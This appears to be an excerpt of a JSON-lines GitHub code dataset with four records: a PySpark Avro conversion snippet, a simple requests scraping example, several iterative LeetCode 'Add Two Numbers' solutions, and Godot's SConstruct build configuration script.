'%Ba%'\").show(truncate=False)\r\n\r\nrdf3=spark.read.json(\"hdfs://randstad-niit-bigdataspark-164-52-214-120-e2e7-70155-ncr.cluster:8020/user/bigdata/olympic.json\")\r\nrdf3.createOrReplaceTempView(\"olympic\")\r\nspark.sql(\"select * from olympic limit 10\").show(truncate=False)\r\nrdf3.coalesce(1).write.mode('Overwrite').format(\"com.databricks.spark.avro\").save(\"/user/bigdata/res6\")\r\n\r\nrdf4 = spark.read.format(\"com.databricks.spark.avro\").load(\"/user/bigdata/res6/*.avro\")\r\nrdf4.createOrReplaceTempView(\"olympic2\")\r\nrdf4.printSchema()\r\nspark.sql(\"select * from olympic2 limit 5\").show(truncate=False)\r\n","repo_name":"MinusOneByTwelve/MiscStuff","sub_path":"DB/Temp/misc/oldcode/FileLoader.py","file_name":"FileLoader.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"} +{"seq_id":"33415343171","text":"import requests\n\nresponse = requests.get(\"http://www.baidu.com\")\nstatus_code = response.status_code\nheader = response.headers\nuser_agent = response.request.headers\nprint(status_code)\nprint(header)\nprint(user_agent)\nprint(response.content.decode())\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36\"}\nresponse = requests.get(\"http://www.baidu.com\",headers = headers)\nprint(response.content.decode())\nuser_agent = response.request.headers\n\nprint(user_agent)\n","repo_name":"microease/Heima-Python-2018","sub_path":"15期/18 通用爬虫模块使用/02-爬虫requests库/001.py","file_name":"001.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"7"} +{"seq_id":"38526370129","text":"#\n# @lc app=leetcode.cn id=2 lang=python3\n#\n# [2] 两数相加\n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n num1 = self.get_number(l1)\n num2 = self.get_number(l2)\n num = num1 + num2\n l3 = self.get_list_node(num)\n return l3\n\n def get_number(self, l1: ListNode) -> int:\n return int(''.join([str(i) for i in l1]))\n\n def get_list_node(self, number: int) -> ListNode:\n return [int(i) for i in str(number).split()]\n\n\nclass Solution:\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n num1 = self.get_number(l1)\n num2 = self.get_number(l2)\n num = num1 + num2\n l3 = self.get_list_node(num)\n return l3\n\n def get_number(self, alist: ListNode) -> int:\n p = alist\n 
nums = []\n while p:\n nums.append(str(p.val))\n p = p.next\n return int(''.join(nums[::-1]))\n\n def get_list_node(self, number: int) -> ListNode:\n number_str = str(number)[::-1]\n alist = ListNode(number_str[0])\n p = alist\n for i in number_str[1:]:\n p.next = ListNode(i)\n p = p.next\n return alist\n\n\nclass Solution:\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n node1 = l1\n node2 = l2\n plus = 0\n node = None\n while node1 and node2:\n val1 = node1.val\n val2 = node2.val\n val = val1+val2 + plus\n val, plus = self.get_val(val, plus)\n node1 = node1.next\n node2 = node2.next\n if node:\n node.next = ListNode(val)\n node = node.next\n else:\n l3 = node = ListNode(val)\n left_node = node1 or node2\n while left_node:\n val = left_node.val + plus\n val, plus = self.get_val(val, plus)\n node.next = ListNode(val)\n node = node.next\n left_node = left_node.next\n if plus:\n node.next = ListNode(plus)\n return l3\n\n def get_val(self, val, plus):\n if val >= 10:\n plus = 1\n val = str(val)[1]\n else:\n plus = 0\n return val, plus\n\n\nclass Solution:\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n plus = 0\n node = self.get_node(l1, l2, plus)\n return node\n\n def get_node(self, node1: ListNode, node2: ListNode, plus: int) -> ListNode:\n if not node1 and not node2 and not plus:\n return\n val1 = node1.val if node1 else 0\n val2 = node2.val if node2 else 0\n val = val1 + val2 + plus\n current_val = val % 10\n plus = val // 10\n node = ListNode(current_val)\n node1 = node1.next if node1 else None\n node2 = node2.next if node2 else None\n node.next = self.get_node(node1, node2, plus)\n return node\n\n\nclass Solution:\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n head = p = ListNode()\n plus = 0\n while l1 or l2 or plus:\n val1 = l1.val if l1 else 0\n val2 = l2.val if l2 else 0\n val = val1 + val2 + plus\n current_val = val % 10\n plus = val // 10\n l1 = l1.next if l1 else None\n l2 = l2.next if l2 else None\n p.next = ListNode(current_val)\n p = p.next\n return head.next\n\n\n# @lc code=end\n","repo_name":"hyram-zhang/leetcode","sub_path":"2.两数相加.py","file_name":"2.两数相加.py","file_ext":"py","file_size_in_byte":3652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24377766369","text":"#!/usr/bin/env python\n\nEnsureSConsVersion(3, 0, 0)\nEnsurePythonVersion(3, 6)\n\n# System\nimport atexit\nimport glob\nimport os\nimport pickle\nimport sys\nimport time\nfrom collections import OrderedDict\n\n# Local\nimport methods\nimport glsl_builders\nimport gles3_builders\nfrom platform_methods import run_in_subprocess\n\n# Scan possible build platforms\n\nplatform_list = [] # list of platforms\nplatform_opts = {} # options for each platform\nplatform_flags = {} # flags for each platform\n\nactive_platforms = []\nactive_platform_ids = []\nplatform_exporters = []\nplatform_apis = []\n\ntime_at_start = time.time()\n\nfor x in sorted(glob.glob(\"platform/*\")):\n if not os.path.isdir(x) or not os.path.exists(x + \"/detect.py\"):\n continue\n tmppath = \"./\" + x\n\n sys.path.insert(0, tmppath)\n import detect\n\n if os.path.exists(x + \"/export/export.cpp\"):\n platform_exporters.append(x[9:])\n if os.path.exists(x + \"/api/api.cpp\"):\n platform_apis.append(x[9:])\n if detect.is_active():\n active_platforms.append(detect.get_name())\n active_platform_ids.append(x)\n if detect.can_build():\n x = x.replace(\"platform/\", \"\") # rest of world\n x = x.replace(\"platform\\\\\", \"\") # 
win32\n platform_list += [x]\n platform_opts[x] = detect.get_opts()\n platform_flags[x] = detect.get_flags()\n sys.path.remove(tmppath)\n sys.modules.pop(\"detect\")\n\nmethods.save_active_platforms(active_platforms, active_platform_ids)\n\ncustom_tools = [\"default\"]\n\nplatform_arg = ARGUMENTS.get(\"platform\", ARGUMENTS.get(\"p\", False))\n\nif os.name == \"nt\" and (platform_arg == \"android\" or methods.get_cmdline_bool(\"use_mingw\", False)):\n custom_tools = [\"mingw\"]\nelif platform_arg == \"javascript\":\n # Use generic POSIX build toolchain for Emscripten.\n custom_tools = [\"cc\", \"c++\", \"ar\", \"link\", \"textfile\", \"zip\"]\n\n# We let SCons build its default ENV as it includes OS-specific things which we don't\n# want to have to pull in manually.\n# Then we prepend PATH to make it take precedence, while preserving SCons' own entries.\nenv_base = Environment(tools=custom_tools)\nenv_base.PrependENVPath(\"PATH\", os.getenv(\"PATH\"))\nenv_base.PrependENVPath(\"PKG_CONFIG_PATH\", os.getenv(\"PKG_CONFIG_PATH\"))\nif \"TERM\" in os.environ: # Used for colored output.\n env_base[\"ENV\"][\"TERM\"] = os.environ[\"TERM\"]\n\nenv_base.disabled_modules = []\nenv_base.module_version_string = \"\"\nenv_base.msvc = False\n\nenv_base.__class__.disable_module = methods.disable_module\n\nenv_base.__class__.add_module_version_string = methods.add_module_version_string\n\nenv_base.__class__.add_source_files = methods.add_source_files\nenv_base.__class__.use_windows_spawn_fix = methods.use_windows_spawn_fix\n\nenv_base.__class__.add_shared_library = methods.add_shared_library\nenv_base.__class__.add_library = methods.add_library\nenv_base.__class__.add_program = methods.add_program\nenv_base.__class__.CommandNoCache = methods.CommandNoCache\nenv_base.__class__.Run = methods.Run\nenv_base.__class__.disable_warnings = methods.disable_warnings\nenv_base.__class__.force_optimization_on_debug = methods.force_optimization_on_debug\nenv_base.__class__.module_check_dependencies = methods.module_check_dependencies\n\nenv_base[\"x86_libtheora_opt_gcc\"] = False\nenv_base[\"x86_libtheora_opt_vc\"] = False\n\n# avoid issues when building with different versions of python out of the same directory\nenv_base.SConsignFile(\".sconsign{0}.dblite\".format(pickle.HIGHEST_PROTOCOL))\n\n# Build options\n\ncustoms = [\"custom.py\"]\n\nprofile = ARGUMENTS.get(\"profile\", \"\")\nif profile:\n if os.path.isfile(profile):\n customs.append(profile)\n elif os.path.isfile(profile + \".py\"):\n customs.append(profile + \".py\")\n\nopts = Variables(customs, ARGUMENTS)\n\n# Target build options\nopts.Add(\"p\", \"Platform (alias for 'platform')\", \"\")\nopts.Add(\"platform\", \"Target platform (%s)\" % (\"|\".join(platform_list),), \"\")\nopts.Add(BoolVariable(\"tools\", \"Build the tools (a.k.a. 
the Godot editor)\", True))\nopts.Add(EnumVariable(\"target\", \"Compilation target\", \"debug\", (\"debug\", \"release_debug\", \"release\")))\nopts.Add(\"arch\", \"Platform-dependent architecture (arm/arm64/x86/x64/mips/...)\", \"\")\nopts.Add(EnumVariable(\"bits\", \"Target platform bits\", \"default\", (\"default\", \"32\", \"64\")))\nopts.Add(EnumVariable(\"float\", \"Floating-point precision\", \"default\", (\"default\", \"32\", \"64\")))\nopts.Add(EnumVariable(\"optimize\", \"Optimization type\", \"speed\", (\"speed\", \"size\", \"none\")))\nopts.Add(BoolVariable(\"production\", \"Set defaults to build Godot for use in production\", False))\nopts.Add(BoolVariable(\"use_lto\", \"Use link-time optimization\", False))\n\n# Components\nopts.Add(BoolVariable(\"deprecated\", \"Enable deprecated features\", True))\nopts.Add(BoolVariable(\"minizip\", \"Enable ZIP archive support using minizip\", True))\nopts.Add(BoolVariable(\"xaudio2\", \"Enable the XAudio2 audio driver\", False))\nopts.Add(BoolVariable(\"vulkan\", \"Enable the vulkan video driver\", True))\nopts.Add(BoolVariable(\"opengl3\", \"Enable the OpenGL/GLES3 video driver\", True))\nopts.Add(\"custom_modules\", \"A list of comma-separated directory paths containing custom modules to build.\", \"\")\nopts.Add(BoolVariable(\"custom_modules_recursive\", \"Detect custom modules recursively for each specified path.\", True))\nopts.Add(BoolVariable(\"use_volk\", \"Use the volk library to load the Vulkan loader dynamically\", True))\n\n# Advanced options\nopts.Add(BoolVariable(\"dev\", \"If yes, alias for verbose=yes warnings=extra werror=yes\", False))\nopts.Add(BoolVariable(\"progress\", \"Show a progress indicator during compilation\", True))\nopts.Add(BoolVariable(\"tests\", \"Build the unit tests\", False))\nopts.Add(BoolVariable(\"verbose\", \"Enable verbose output for the compilation\", False))\nopts.Add(EnumVariable(\"warnings\", \"Level of compilation warnings\", \"all\", (\"extra\", \"all\", \"moderate\", \"no\")))\nopts.Add(BoolVariable(\"werror\", \"Treat compiler warnings as errors\", False))\nopts.Add(\"extra_suffix\", \"Custom extra suffix added to the base filename of all generated binary files\", \"\")\nopts.Add(BoolVariable(\"vsproj\", \"Generate a Visual Studio solution\", False))\nopts.Add(BoolVariable(\"disable_3d\", \"Disable 3D nodes for a smaller executable\", False))\nopts.Add(BoolVariable(\"disable_advanced_gui\", \"Disable advanced GUI nodes and behaviors\", False))\nopts.Add(\"disable_classes\", \"Disable given classes (comma separated)\", \"\")\nopts.Add(BoolVariable(\"modules_enabled_by_default\", \"If no, disable all modules except ones explicitly enabled\", True))\nopts.Add(BoolVariable(\"no_editor_splash\", \"Don't use the custom splash screen for the editor\", False))\nopts.Add(\"system_certs_path\", \"Use this path as SSL certificates default for editor (for package maintainers)\", \"\")\nopts.Add(BoolVariable(\"use_precise_math_checks\", \"Math checks use very precise epsilon (debug option)\", False))\n\n# Thirdparty libraries\nopts.Add(BoolVariable(\"builtin_bullet\", \"Use the built-in Bullet library\", True))\nopts.Add(BoolVariable(\"builtin_certs\", \"Use the built-in SSL certificates bundles\", True))\nopts.Add(BoolVariable(\"builtin_embree\", \"Use the built-in Embree library\", True))\nopts.Add(BoolVariable(\"builtin_enet\", \"Use the built-in ENet library\", True))\nopts.Add(BoolVariable(\"builtin_freetype\", \"Use the built-in FreeType library\", 
True))\nopts.Add(BoolVariable(\"builtin_msdfgen\", \"Use the built-in MSDFgen library\", True))\nopts.Add(BoolVariable(\"builtin_glslang\", \"Use the built-in glslang library\", True))\nopts.Add(BoolVariable(\"builtin_graphite\", \"Use the built-in Graphite library\", True))\nopts.Add(BoolVariable(\"builtin_harfbuzz\", \"Use the built-in HarfBuzz library\", True))\nopts.Add(BoolVariable(\"builtin_icu\", \"Use the built-in ICU library\", True))\nopts.Add(BoolVariable(\"builtin_libogg\", \"Use the built-in libogg library\", True))\nopts.Add(BoolVariable(\"builtin_libpng\", \"Use the built-in libpng library\", True))\nopts.Add(BoolVariable(\"builtin_libtheora\", \"Use the built-in libtheora library\", True))\nopts.Add(BoolVariable(\"builtin_libvorbis\", \"Use the built-in libvorbis library\", True))\nopts.Add(BoolVariable(\"builtin_libwebp\", \"Use the built-in libwebp library\", True))\nopts.Add(BoolVariable(\"builtin_wslay\", \"Use the built-in wslay library\", True))\nopts.Add(BoolVariable(\"builtin_mbedtls\", \"Use the built-in mbedTLS library\", True))\nopts.Add(BoolVariable(\"builtin_miniupnpc\", \"Use the built-in miniupnpc library\", True))\nopts.Add(BoolVariable(\"builtin_pcre2\", \"Use the built-in PCRE2 library\", True))\nopts.Add(BoolVariable(\"builtin_pcre2_with_jit\", \"Use JIT compiler for the built-in PCRE2 library\", True))\nopts.Add(BoolVariable(\"builtin_recast\", \"Use the built-in Recast library\", True))\nopts.Add(BoolVariable(\"builtin_rvo2\", \"Use the built-in RVO2 library\", True))\nopts.Add(BoolVariable(\"builtin_squish\", \"Use the built-in squish library\", True))\nopts.Add(BoolVariable(\"builtin_xatlas\", \"Use the built-in xatlas library\", True))\nopts.Add(BoolVariable(\"builtin_zlib\", \"Use the built-in zlib library\", True))\nopts.Add(BoolVariable(\"builtin_zstd\", \"Use the built-in Zstd library\", True))\n\n# Compilation environment setup\nopts.Add(\"CXX\", \"C++ compiler\")\nopts.Add(\"CC\", \"C compiler\")\nopts.Add(\"LINK\", \"Linker\")\nopts.Add(\"CCFLAGS\", \"Custom flags for both the C and C++ compilers\")\nopts.Add(\"CFLAGS\", \"Custom flags for the C compiler\")\nopts.Add(\"CXXFLAGS\", \"Custom flags for the C++ compiler\")\nopts.Add(\"LINKFLAGS\", \"Custom flags for the linker\")\n\n# Update the environment to have all above options defined\n# in following code (especially platform and custom_modules).\nopts.Update(env_base)\n\n# Platform selection: validate input, and add options.\n\nselected_platform = \"\"\n\nif env_base[\"platform\"] != \"\":\n selected_platform = env_base[\"platform\"]\nelif env_base[\"p\"] != \"\":\n selected_platform = env_base[\"p\"]\nelse:\n # Missing `platform` argument, try to detect platform automatically\n if (\n sys.platform.startswith(\"linux\")\n or sys.platform.startswith(\"dragonfly\")\n or sys.platform.startswith(\"freebsd\")\n or sys.platform.startswith(\"netbsd\")\n or sys.platform.startswith(\"openbsd\")\n ):\n selected_platform = \"linuxbsd\"\n elif sys.platform == \"darwin\":\n selected_platform = \"osx\"\n elif sys.platform == \"win32\":\n selected_platform = \"windows\"\n else:\n print(\"Could not detect platform automatically. 
Supported platforms:\")\n        for x in platform_list:\n            print(\"\\t\" + x)\n        print(\"\\nPlease run SCons again and select a valid platform: platform=<string>\")\n\n    if selected_platform != \"\":\n        print(\"Automatically detected platform: \" + selected_platform)\n\nif selected_platform in [\"linux\", \"bsd\", \"x11\"]:\n    if selected_platform == \"x11\":\n        # Deprecated alias kept for compatibility.\n        print('Platform \"x11\" has been renamed to \"linuxbsd\" in Godot 4.0. Building for platform \"linuxbsd\".')\n    # Alias for convenience.\n    selected_platform = \"linuxbsd\"\n\n# Make sure to update this to the found, valid platform as it's used through the buildsystem as the reference.\n# It should always be re-set after calling `opts.Update()` otherwise it uses the original input value.\nenv_base[\"platform\"] = selected_platform\n\n# Add platform-specific options.\nif selected_platform in platform_opts:\n    for opt in platform_opts[selected_platform]:\n        opts.Add(opt)\n\n# Update the environment to take platform-specific options into account.\nopts.Update(env_base)\nenv_base[\"platform\"] = selected_platform  # Must always be re-set after calling opts.Update().\n\n# Detect modules.\nmodules_detected = OrderedDict()\nmodule_search_paths = [\"modules\"]  # Built-in path.\n\nif env_base[\"custom_modules\"]:\n    paths = env_base[\"custom_modules\"].split(\",\")\n    for p in paths:\n        try:\n            module_search_paths.append(methods.convert_custom_modules_path(p))\n        except ValueError as e:\n            print(e)\n            Exit(255)\n\nfor path in module_search_paths:\n    if path == \"modules\":\n        # Built-in modules don't have nested modules,\n        # so save the time it takes to parse directories.\n        modules = methods.detect_modules(path, recursive=False)\n    else:  # Custom.\n        modules = methods.detect_modules(path, env_base[\"custom_modules_recursive\"])\n    # Provide default include path for both the custom module search `path`\n    # and the base directory containing custom modules, as it may be different\n    # from the built-in \"modules\" name (e.g. 
\"custom_modules/summator/summator.h\"),\n # so it can be referenced simply as `#include \"summator/summator.h\"`\n # independently of where a module is located on user's filesystem.\n env_base.Prepend(CPPPATH=[path, os.path.dirname(path)])\n # Note: custom modules can override built-in ones.\n modules_detected.update(modules)\n\n# Add module options.\nfor name, path in modules_detected.items():\n if env_base[\"modules_enabled_by_default\"]:\n enabled = True\n\n sys.path.insert(0, path)\n import config\n\n try:\n enabled = config.is_enabled()\n except AttributeError:\n pass\n sys.path.remove(path)\n sys.modules.pop(\"config\")\n else:\n enabled = False\n\n opts.Add(BoolVariable(\"module_\" + name + \"_enabled\", \"Enable module '%s'\" % (name,), enabled))\n\nmethods.write_modules(modules_detected)\n\n# Update the environment again after all the module options are added.\nopts.Update(env_base)\nenv_base[\"platform\"] = selected_platform # Must always be re-set after calling opts.Update().\nHelp(opts.GenerateHelpText(env_base))\n\n# add default include paths\n\nenv_base.Prepend(CPPPATH=[\"#\"])\n\n# configure ENV for platform\nenv_base.platform_exporters = platform_exporters\nenv_base.platform_apis = platform_apis\n\n# Build type defines - more platform-specific ones can be in detect.py.\nif env_base[\"target\"] == \"release_debug\" or env_base[\"target\"] == \"debug\":\n # DEBUG_ENABLED enables debugging *features* and debug-only code, which is intended\n # to give *users* extra debugging information for their game development.\n env_base.Append(CPPDEFINES=[\"DEBUG_ENABLED\"])\n\nif env_base[\"target\"] == \"debug\":\n # DEV_ENABLED enables *engine developer* code which should only be compiled for those\n # working on the engine itself.\n env_base.Append(CPPDEFINES=[\"DEV_ENABLED\"])\n\nif env_base[\"use_precise_math_checks\"]:\n env_base.Append(CPPDEFINES=[\"PRECISE_MATH_CHECKS\"])\n\nif env_base[\"no_editor_splash\"]:\n env_base.Append(CPPDEFINES=[\"NO_EDITOR_SPLASH\"])\n\nif not env_base[\"deprecated\"]:\n env_base.Append(CPPDEFINES=[\"DISABLE_DEPRECATED\"])\n\nif env_base[\"float\"] == \"64\":\n env_base.Append(CPPDEFINES=[\"REAL_T_IS_DOUBLE\"])\n\nif selected_platform in platform_list:\n tmppath = \"./platform/\" + selected_platform\n sys.path.insert(0, tmppath)\n import detect\n\n if \"create\" in dir(detect):\n env = detect.create(env_base)\n else:\n env = env_base.Clone()\n\n # Generating the compilation DB (`compile_commands.json`) requires SCons 4.0.0 or later.\n from SCons import __version__ as scons_raw_version\n\n scons_ver = env._get_major_minor_revision(scons_raw_version)\n\n if scons_ver >= (4, 0, 0):\n env.Tool(\"compilation_db\")\n env.Alias(\"compiledb\", env.CompilationDatabase())\n\n # 'dev' and 'production' are aliases to set default options if they haven't been set\n # manually by the user.\n if env[\"dev\"]:\n env[\"verbose\"] = methods.get_cmdline_bool(\"verbose\", True)\n env[\"warnings\"] = ARGUMENTS.get(\"warnings\", \"extra\")\n env[\"werror\"] = methods.get_cmdline_bool(\"werror\", True)\n if env[\"tools\"]:\n env[\"tests\"] = methods.get_cmdline_bool(\"tests\", True)\n if env[\"production\"]:\n env[\"use_static_cpp\"] = methods.get_cmdline_bool(\"use_static_cpp\", True)\n env[\"use_lto\"] = methods.get_cmdline_bool(\"use_lto\", True)\n env[\"debug_symbols\"] = methods.get_cmdline_bool(\"debug_symbols\", False)\n if not env[\"tools\"] and env[\"target\"] == \"debug\":\n print(\n \"WARNING: Requested `production` build with `tools=no target=debug`, \"\n \"this 
will give you a full debug template (use `target=release_debug` \"\n \"for an optimized template with debug features).\"\n )\n if env.msvc:\n print(\n \"WARNING: For `production` Windows builds, you should use MinGW with GCC \"\n \"or Clang instead of Visual Studio, as they can better optimize the \"\n \"GDScript VM in a very significant way. MSVC LTO also doesn't work \"\n \"reliably for our use case.\"\n \"If you want to use MSVC nevertheless for production builds, set \"\n \"`debug_symbols=no use_lto=no` instead of the `production=yes` option.\"\n )\n Exit(255)\n\n env.extra_suffix = \"\"\n\n if env[\"extra_suffix\"] != \"\":\n env.extra_suffix += \".\" + env[\"extra_suffix\"]\n\n # Environment flags\n CCFLAGS = env.get(\"CCFLAGS\", \"\")\n env[\"CCFLAGS\"] = \"\"\n env.Append(CCFLAGS=str(CCFLAGS).split())\n\n CFLAGS = env.get(\"CFLAGS\", \"\")\n env[\"CFLAGS\"] = \"\"\n env.Append(CFLAGS=str(CFLAGS).split())\n\n CXXFLAGS = env.get(\"CXXFLAGS\", \"\")\n env[\"CXXFLAGS\"] = \"\"\n env.Append(CXXFLAGS=str(CXXFLAGS).split())\n\n LINKFLAGS = env.get(\"LINKFLAGS\", \"\")\n env[\"LINKFLAGS\"] = \"\"\n env.Append(LINKFLAGS=str(LINKFLAGS).split())\n\n # Platform specific flags\n flag_list = platform_flags[selected_platform]\n for f in flag_list:\n if not (f[0] in ARGUMENTS): # allow command line to override platform flags\n env[f[0]] = f[1]\n\n # Must happen after the flags' definition, so that they can be used by platform detect\n detect.configure(env)\n\n # Set our C and C++ standard requirements.\n # C++17 is required as we need guaranteed copy elision as per GH-36436.\n # Prepending to make it possible to override.\n # This needs to come after `configure`, otherwise we don't have env.msvc.\n if not env.msvc:\n # Specifying GNU extensions support explicitly, which are supported by\n # both GCC and Clang. Both currently default to gnu11 and gnu++14.\n env.Prepend(CFLAGS=[\"-std=gnu11\"])\n env.Prepend(CXXFLAGS=[\"-std=gnu++17\"])\n else:\n # MSVC doesn't have clear C standard support, /std only covers C++.\n # We apply it to CCFLAGS (both C and C++ code) in case it impacts C features.\n env.Prepend(CCFLAGS=[\"/std:c++17\"])\n\n # Enforce our minimal compiler version requirements\n cc_version = methods.get_compiler_version(env) or {\n \"major\": None,\n \"minor\": None,\n \"patch\": None,\n \"metadata1\": None,\n \"metadata2\": None,\n \"date\": None,\n }\n cc_version_major = int(cc_version[\"major\"] or -1)\n cc_version_minor = int(cc_version[\"minor\"] or -1)\n cc_version_metadata1 = cc_version[\"metadata1\"] or \"\"\n\n if methods.using_gcc(env):\n if cc_version_major == -1:\n print(\n \"Couldn't detect compiler version, skipping version checks. \"\n \"Build may fail if the compiler doesn't support C++17 fully.\"\n )\n # GCC 8 before 8.4 has a regression in the support of guaranteed copy elision\n # which causes a build failure: https://gcc.gnu.org/bugzilla/show_bug.cgi?id=86521\n elif cc_version_major == 8 and cc_version_minor < 4:\n print(\n \"Detected GCC 8 version < 8.4, which is not supported due to a \"\n \"regression in its C++17 guaranteed copy elision support. Use a \"\n 'newer GCC version, or Clang 6 or later by passing \"use_llvm=yes\" '\n \"to the SCons command line.\"\n )\n Exit(255)\n elif cc_version_major < 7:\n print(\n \"Detected GCC version older than 7, which does not fully support \"\n \"C++17. Supported versions are GCC 7, 9 and later. 
Use a newer GCC \"\n 'version, or Clang 6 or later by passing \"use_llvm=yes\" to the '\n \"SCons command line.\"\n )\n Exit(255)\n elif cc_version_metadata1 == \"win32\":\n print(\n \"Detected mingw version is not using posix threads. Only posix \"\n \"version of mingw is supported. \"\n 'Use \"update-alternatives --config -w64-mingw32-[gcc|g++]\" '\n \"to switch to posix threads.\"\n )\n Exit(255)\n elif methods.using_clang(env):\n if cc_version_major == -1:\n print(\n \"Couldn't detect compiler version, skipping version checks. \"\n \"Build may fail if the compiler doesn't support C++17 fully.\"\n )\n # Apple LLVM versions differ from upstream LLVM version \\o/, compare\n # in https://en.wikipedia.org/wiki/Xcode#Toolchain_versions\n elif env[\"platform\"] == \"osx\" or env[\"platform\"] == \"iphone\":\n vanilla = methods.is_vanilla_clang(env)\n if vanilla and cc_version_major < 6:\n print(\n \"Detected Clang version older than 6, which does not fully support \"\n \"C++17. Supported versions are Clang 6 and later.\"\n )\n Exit(255)\n elif not vanilla and cc_version_major < 10:\n print(\n \"Detected Apple Clang version older than 10, which does not fully \"\n \"support C++17. Supported versions are Apple Clang 10 and later.\"\n )\n Exit(255)\n elif cc_version_major < 6:\n print(\n \"Detected Clang version older than 6, which does not fully support \"\n \"C++17. Supported versions are Clang 6 and later.\"\n )\n Exit(255)\n\n # Configure compiler warnings\n if env.msvc: # MSVC\n # Truncations, narrowing conversions, signed/unsigned comparisons...\n disable_nonessential_warnings = [\"/wd4267\", \"/wd4244\", \"/wd4305\", \"/wd4018\", \"/wd4800\"]\n if env[\"warnings\"] == \"extra\":\n env.Append(CCFLAGS=[\"/Wall\"]) # Implies /W4\n elif env[\"warnings\"] == \"all\":\n env.Append(CCFLAGS=[\"/W3\"] + disable_nonessential_warnings)\n elif env[\"warnings\"] == \"moderate\":\n env.Append(CCFLAGS=[\"/W2\"] + disable_nonessential_warnings)\n else: # 'no'\n env.Append(CCFLAGS=[\"/w\"])\n # Set exception handling model to avoid warnings caused by Windows system headers.\n env.Append(CCFLAGS=[\"/EHsc\"])\n\n if env[\"werror\"]:\n env.Append(CCFLAGS=[\"/WX\"])\n else: # GCC, Clang\n common_warnings = []\n\n if methods.using_gcc(env):\n common_warnings += [\"-Wshadow-local\", \"-Wno-misleading-indentation\"]\n elif methods.using_clang(env) or methods.using_emcc(env):\n # We often implement `operator<` for structs of pointers as a requirement\n # for putting them in `Set` or `Map`. 
We don't mind about unreliable ordering.\n common_warnings += [\"-Wno-ordered-compare-function-pointers\"]\n\n if env[\"warnings\"] == \"extra\":\n env.Append(CCFLAGS=[\"-Wall\", \"-Wextra\", \"-Wwrite-strings\", \"-Wno-unused-parameter\"] + common_warnings)\n env.Append(CXXFLAGS=[\"-Wctor-dtor-privacy\", \"-Wnon-virtual-dtor\"])\n if methods.using_gcc(env):\n env.Append(\n CCFLAGS=[\n \"-Walloc-zero\",\n \"-Wduplicated-branches\",\n \"-Wduplicated-cond\",\n \"-Wstringop-overflow=4\",\n \"-Wlogical-op\",\n ]\n )\n # -Wnoexcept was removed temporarily due to GH-36325.\n env.Append(CXXFLAGS=[\"-Wplacement-new=1\"])\n if cc_version_major >= 9:\n env.Append(CCFLAGS=[\"-Wattribute-alias=2\"])\n elif methods.using_clang(env) or methods.using_emcc(env):\n env.Append(CCFLAGS=[\"-Wimplicit-fallthrough\"])\n elif env[\"warnings\"] == \"all\":\n env.Append(CCFLAGS=[\"-Wall\"] + common_warnings)\n elif env[\"warnings\"] == \"moderate\":\n env.Append(CCFLAGS=[\"-Wall\", \"-Wno-unused\"] + common_warnings)\n else: # 'no'\n env.Append(CCFLAGS=[\"-w\"])\n\n if env[\"werror\"]:\n env.Append(CCFLAGS=[\"-Werror\"])\n # FIXME: Temporary workaround after the Vulkan merge, remove once warnings are fixed.\n if methods.using_gcc(env):\n env.Append(CXXFLAGS=[\"-Wno-error=cpp\"])\n if cc_version_major == 7: # Bogus warning fixed in 8+.\n env.Append(CCFLAGS=[\"-Wno-error=strict-overflow\"])\n elif methods.using_clang(env) or methods.using_emcc(env):\n env.Append(CXXFLAGS=[\"-Wno-error=#warnings\"])\n else: # always enable those errors\n env.Append(CCFLAGS=[\"-Werror=return-type\"])\n\n if hasattr(detect, \"get_program_suffix\"):\n suffix = \".\" + detect.get_program_suffix()\n else:\n suffix = \".\" + selected_platform\n\n if env_base[\"float\"] == \"64\":\n suffix += \".double\"\n\n if env[\"target\"] == \"release\":\n if env[\"tools\"]:\n print(\"Error: The editor can only be built with `target=debug` or `target=release_debug`.\")\n Exit(255)\n suffix += \".opt\"\n env.Append(CPPDEFINES=[\"NDEBUG\"])\n elif env[\"target\"] == \"release_debug\":\n if env[\"tools\"]:\n suffix += \".opt.tools\"\n else:\n suffix += \".opt.debug\"\n else:\n if env[\"tools\"]:\n print(\n \"Note: Building a debug binary (which will run slowly). Use `target=release_debug` to build an optimized release binary.\"\n )\n suffix += \".tools\"\n else:\n print(\n \"Note: Building a debug binary (which will run slowly). 
Use `target=release` to build an optimized release binary.\"\n )\n suffix += \".debug\"\n\n if env[\"arch\"] != \"\":\n suffix += \".\" + env[\"arch\"]\n elif env[\"bits\"] == \"32\":\n suffix += \".32\"\n elif env[\"bits\"] == \"64\":\n suffix += \".64\"\n\n suffix += env.extra_suffix\n\n sys.path.remove(tmppath)\n sys.modules.pop(\"detect\")\n\n modules_enabled = OrderedDict()\n env.module_icons_paths = []\n env.doc_class_path = {}\n\n for name, path in modules_detected.items():\n if not env[\"module_\" + name + \"_enabled\"]:\n continue\n sys.path.insert(0, path)\n env.current_module = name\n import config\n\n if config.can_build(env, selected_platform):\n config.configure(env)\n # Get doc classes paths (if present)\n try:\n doc_classes = config.get_doc_classes()\n doc_path = config.get_doc_path()\n for c in doc_classes:\n env.doc_class_path[c] = path + \"/\" + doc_path\n except Exception:\n pass\n # Get icon paths (if present)\n try:\n icons_path = config.get_icons_path()\n env.module_icons_paths.append(path + \"/\" + icons_path)\n except Exception:\n # Default path for module icons\n env.module_icons_paths.append(path + \"/\" + \"icons\")\n modules_enabled[name] = path\n\n sys.path.remove(path)\n sys.modules.pop(\"config\")\n\n env.module_list = modules_enabled\n\n methods.update_version(env.module_version_string)\n\n env[\"PROGSUFFIX\"] = suffix + env.module_version_string + env[\"PROGSUFFIX\"]\n env[\"OBJSUFFIX\"] 